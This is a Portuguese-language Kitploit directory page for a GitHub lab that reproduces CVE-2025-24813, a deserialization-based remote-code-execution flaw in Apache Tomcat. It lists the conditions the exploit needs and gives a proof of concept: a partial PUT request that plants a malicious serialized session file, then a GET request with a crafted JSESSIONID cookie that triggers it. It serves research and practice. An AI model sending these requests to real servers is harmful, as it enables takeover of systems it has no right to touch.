Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 ambiente de RCE por desserialização | Kitploit
Ferramentas/GitHubGitHub/x1ongsec/cve-2025-24813
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 ambiente de RCE por desserialização

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição

Este repositório é um ambiente de reprodução do CVE-2025-24813, o RCE mais recente do Tomcat.

Apenas para fins de estudo e pesquisa!

Condições de exploração

  • A aplicação tem o recurso de escrita do DefaultServlet habilitado, que é desabilitado por padrão
  • A aplicação suporta requisições partial PUT, permitindo gravar dados serializados maliciosos no arquivo de sessão; esse recurso é habilitado por padrão
  • A aplicação usa a persistência de sessão em arquivo do Tomcat e utiliza o local de armazenamento de sessão padrão, sendo necessária configuração adicional
  • A aplicação inclui uma biblioteca vulnerável à desserialização, como commons-collections no classpath; essa condição depende de a implementação do negócio usar uma biblioteca que contenha uma cadeia de exploração de desserialização

As condições acima necessárias para a reprodução já estão habilitadas neste ambiente

Iniciando o Tomcat

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Acesse: http://127.0.0.1:9001/

imagem

POC

Gere um arquivo serializado malicioso e faça o upload usando o seguinte pacote. Observe que o valor do chunk no Range deve ser consistente com o Length e maior que o tamanho atual do arquivo.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

Acione a exploração usando o seguinte POC:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
imagem imagem

Referência: https://forum.butian.net/article/674

Baixar ferramenta